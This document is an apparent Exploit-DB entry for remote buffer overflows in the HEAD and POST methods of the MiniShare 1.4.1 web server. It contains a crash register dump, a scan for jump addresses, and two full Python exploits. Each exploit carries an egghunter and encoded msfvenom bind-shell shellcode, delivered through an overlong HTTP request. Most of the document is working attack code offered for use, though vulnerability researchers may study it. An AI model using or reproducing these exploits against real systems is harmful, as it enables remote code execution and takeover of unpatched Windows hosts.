MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow

EDB-ID:

45999




Platform:

Windows

Date:

2018-12-18


Not only the GET method is vulnerable to BOF (CVE-2004-2271). HEAD and POST
methods are also vulnerable. The difference is minimal, both are exploited
in the same way. Only 1 byte difference: GET = 3, HEAD and POST = 4 length

-------------------------------------------------------------------

EAX 00000000
ECX 77C3EF3B msvcrt.77C3EF3B
EDX 00F14E38
EBX 43346843
ESP 01563908 ASCII
"6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co
HTTP/1.1
"
EBP 0156BB90
ESI 00000001
EDI 01565B68
EIP 68433568
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 1  SS 0023 32bit 0(FFFFFFFF)
Z 0  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDD000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00010216 (NO,NB,NE,A,NS,PE,GE,G)
ST0 empty
ST1 empty
ST2 empty
ST3 empty
ST4 empty
ST5 empty
ST6 empty
ST7 empty
               3 2 1 0      E S P U O Z D I
FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

------------------------------------------------------------------------------

Only 210 bytes to shellcode

------------------------------------------------------------------------------

Badchars '00','0d'

------------------------------------------------------------------------------

>findjmp kernel32.dll esp - XP SP 3 English

Scanning kernel32.dll for code useable with the esp register
0x7C809F83      call esp
0x7C8369E0      call esp
0x7C83C2C5      push esp - ret
0x7C87641B      call esp


<!--
# Exploit Title: Buffer overflow in MiniShare 1.4.1 HEAD method.
# Date: 05-12-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://minishare.sourceforge.net/
# Software Link: http://minishare.sourceforge.net/
# Version: Minishare v1.4.1
# Tested on: Windows
# CVE : CVE-2018-19861
# Category: exploit

1. Description

Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to
execute arbitrary code via a long HTTP HEAD request.


2. Proof of Concept

Exploit:

#!/usr/bin/env python
import socket
import struct
import os

# Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to
execute arbitrary code via a long HTTP HEAD request - by Rafa
# CVE: CVE-2018-19861
# Via Egghunter because shellcode in ESP only 210 bytes long.
# Project Home Page (MiniShare) - http://minishare.sourceforge.net/
connection=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = "127.0.0.1"
port = 80

# 32 bytes Egghunter - Egg = r4f4 = \x72\x34\x66\x34
egghunter =
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

#msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f
python -a x86 --platform windows -b "\x00\x0d" -f c
#Found 10 compatible encoders
#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
#x86/shikata_ga_nai succeeded with size 355 (iteration=0)
#x86/shikata_ga_nai chosen with final size 355
#Payload size: 355 bytes
#Final size of c file: 1516 bytes
#unsigned char buf[] =
shellcode=("r4f4r4f4"+"\xda\xd4\xb8\xda\xe7\x1b\xca\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
"\x53\x83\xea\xfc\x31\x42\x13\x03\x98\xf4\xf9\x3f\xe0\x13\x7f"
"\xbf\x18\xe4\xe0\x49\xfd\xd5\x20\x2d\x76\x45\x91\x25\xda\x6a"
"\x5a\x6b\xce\xf9\x2e\xa4\xe1\x4a\x84\x92\xcc\x4b\xb5\xe7\x4f"
"\xc8\xc4\x3b\xaf\xf1\x06\x4e\xae\x36\x7a\xa3\xe2\xef\xf0\x16"
"\x12\x9b\x4d\xab\x99\xd7\x40\xab\x7e\xaf\x63\x9a\xd1\xbb\x3d"
"\x3c\xd0\x68\x36\x75\xca\x6d\x73\xcf\x61\x45\x0f\xce\xa3\x97"
"\xf0\x7d\x8a\x17\x03\x7f\xcb\x90\xfc\x0a\x25\xe3\x81\x0c\xf2"
"\x99\x5d\x98\xe0\x3a\x15\x3a\xcc\xbb\xfa\xdd\x87\xb0\xb7\xaa"
"\xcf\xd4\x46\x7e\x64\xe0\xc3\x81\xaa\x60\x97\xa5\x6e\x28\x43"
"\xc7\x37\x94\x22\xf8\x27\x77\x9a\x5c\x2c\x9a\xcf\xec\x6f\xf3"
"\x3c\xdd\x8f\x03\x2b\x56\xfc\x31\xf4\xcc\x6a\x7a\x7d\xcb\x6d"
"\x7d\x54\xab\xe1\x80\x57\xcc\x28\x47\x03\x9c\x42\x6e\x2c\x77"
"\x92\x8f\xf9\xe2\x9a\x36\x52\x11\x67\x88\x02\x95\xc7\x61\x49"
"\x1a\x38\x91\x72\xf0\x51\x3a\x8f\xfb\x4c\xe7\x06\x1d\x04\x07"
"\x4f\xb5\xb0\xe5\xb4\x0e\x27\x15\x9f\x26\xcf\x5e\xc9\xf1\xf0"
"\x5e\xdf\x55\x66\xd5\x0c\x62\x97\xea\x18\xc2\xc0\x7d\xd6\x83"
"\xa3\x1c\xe7\x89\x53\xbc\x7a\x56\xa3\xcb\x66\xc1\xf4\x9c\x59"
"\x18\x90\x30\xc3\xb2\x86\xc8\x95\xfd\x02\x17\x66\x03\x8b\xda"
"\xd2\x27\x9b\x22\xda\x63\xcf\xfa\x8d\x3d\xb9\xbc\x67\x8c\x13"
"\x17\xdb\x46\xf3\xee\x17\x59\x85\xee\x7d\x2f\x69\x5e\x28\x76"
"\x96\x6f\xbc\x7e\xef\x8d\x5c\x80\x3a\x16\x6c\xcb\x66\x3f\xe5"
"\x92\xf3\x7d\x68\x25\x2e\x41\x95\xa6\xda\x3a\x62\xb6\xaf\x3f"
"\x2e\x70\x5c\x32\x3f\x15\x62\xe1\x40\x3c")

# findjmp kernel32.dll esp - WinXP SP3 English
#0x7C809F83      call esp

nops = "\x90" * 16

junk = "A" * 1786 + "\x83\x9f\x80\x7c" + nops + egghunter + "C" * (2000 -
1786 - 4 - 16 - len(egghunter))

try:
print "Sending exploit..."
connection.connect((host,port))
buffer = (
"HEAD " + junk + " HTTP/1.1\r\n"
"Host: " + shellcode + "\r\n\r\n")

connection.send(buffer)
connection.close()
print "\nExploit Sended ", len(buffer)
except:
print "Connection error"



3. Solution:

This product is deprecated

-->


<!--
# Exploit Title: Buffer overflow in MiniShare 1.4.1 POST method.
# Date: 05-12-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://minishare.sourceforge.net/
# Software Link: http://minishare.sourceforge.net/
# Version: Minishare v1.4.1
# Tested on: Windows
# CVE : CVE-2018-19862
# Category: exploit

1. Description

Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to
execute arbitrary code via a long HTTP POST request.


2. Proof of Concept

Exploit:

#!/usr/bin/env python
import socket
import struct
import os

# Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to
execute arbitrary code via a long HTTP POST request - by Rafa
# CVE: CVE-2018-19862
# Via Egghunter because shellcode in ESP only 210 bytes long.
# Project Home Page (MiniShare) - http://minishare.sourceforge.net/
connection=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = "127.0.0.1"
port = 80

# 32 bytes Egghunter - Egg = r4f4 = \x72\x34\x66\x34
egghunter =
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

#msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f
python -a x86 --platform windows -b "\x00\x0d" -f c
#Found 10 compatible encoders
#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
#x86/shikata_ga_nai succeeded with size 355 (iteration=0)
#x86/shikata_ga_nai chosen with final size 355
#Payload size: 355 bytes
#Final size of c file: 1516 bytes
#unsigned char buf[] =
shellcode=("r4f4r4f4"+"\xda\xd4\xb8\xda\xe7\x1b\xca\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
"\x53\x83\xea\xfc\x31\x42\x13\x03\x98\xf4\xf9\x3f\xe0\x13\x7f"
"\xbf\x18\xe4\xe0\x49\xfd\xd5\x20\x2d\x76\x45\x91\x25\xda\x6a"
"\x5a\x6b\xce\xf9\x2e\xa4\xe1\x4a\x84\x92\xcc\x4b\xb5\xe7\x4f"
"\xc8\xc4\x3b\xaf\xf1\x06\x4e\xae\x36\x7a\xa3\xe2\xef\xf0\x16"
"\x12\x9b\x4d\xab\x99\xd7\x40\xab\x7e\xaf\x63\x9a\xd1\xbb\x3d"
"\x3c\xd0\x68\x36\x75\xca\x6d\x73\xcf\x61\x45\x0f\xce\xa3\x97"
"\xf0\x7d\x8a\x17\x03\x7f\xcb\x90\xfc\x0a\x25\xe3\x81\x0c\xf2"
"\x99\x5d\x98\xe0\x3a\x15\x3a\xcc\xbb\xfa\xdd\x87\xb0\xb7\xaa"
"\xcf\xd4\x46\x7e\x64\xe0\xc3\x81\xaa\x60\x97\xa5\x6e\x28\x43"
"\xc7\x37\x94\x22\xf8\x27\x77\x9a\x5c\x2c\x9a\xcf\xec\x6f\xf3"
"\x3c\xdd\x8f\x03\x2b\x56\xfc\x31\xf4\xcc\x6a\x7a\x7d\xcb\x6d"
"\x7d\x54\xab\xe1\x80\x57\xcc\x28\x47\x03\x9c\x42\x6e\x2c\x77"
"\x92\x8f\xf9\xe2\x9a\x36\x52\x11\x67\x88\x02\x95\xc7\x61\x49"
"\x1a\x38\x91\x72\xf0\x51\x3a\x8f\xfb\x4c\xe7\x06\x1d\x04\x07"
"\x4f\xb5\xb0\xe5\xb4\x0e\x27\x15\x9f\x26\xcf\x5e\xc9\xf1\xf0"
"\x5e\xdf\x55\x66\xd5\x0c\x62\x97\xea\x18\xc2\xc0\x7d\xd6\x83"
"\xa3\x1c\xe7\x89\x53\xbc\x7a\x56\xa3\xcb\x66\xc1\xf4\x9c\x59"
"\x18\x90\x30\xc3\xb2\x86\xc8\x95\xfd\x02\x17\x66\x03\x8b\xda"
"\xd2\x27\x9b\x22\xda\x63\xcf\xfa\x8d\x3d\xb9\xbc\x67\x8c\x13"
"\x17\xdb\x46\xf3\xee\x17\x59\x85\xee\x7d\x2f\x69\x5e\x28\x76"
"\x96\x6f\xbc\x7e\xef\x8d\x5c\x80\x3a\x16\x6c\xcb\x66\x3f\xe5"
"\x92\xf3\x7d\x68\x25\x2e\x41\x95\xa6\xda\x3a\x62\xb6\xaf\x3f"
"\x2e\x70\x5c\x32\x3f\x15\x62\xe1\x40\x3c")

# findjmp kernel32.dll esp - WinXP SP3 English
#0x7C809F83      call esp

nops = "\x90" * 16

junk = "A" * 1786 + "\x83\x9f\x80\x7c" + nops + egghunter + "C" * (2000 -
1786 - 4 - 16 - len(egghunter))

try:
print "Sending exploit..."
connection.connect((host,port))

buffer = (
"POST " + junk + " HTTP/1.1\r\n"
"Host: " + shellcode + "\r\n\r\n")

connection.send(buffer)
connection.close()
print "\nExploit Sended ", len(buffer)
except:
print "Connection error"



3. Solution:

This product is deprecated

-->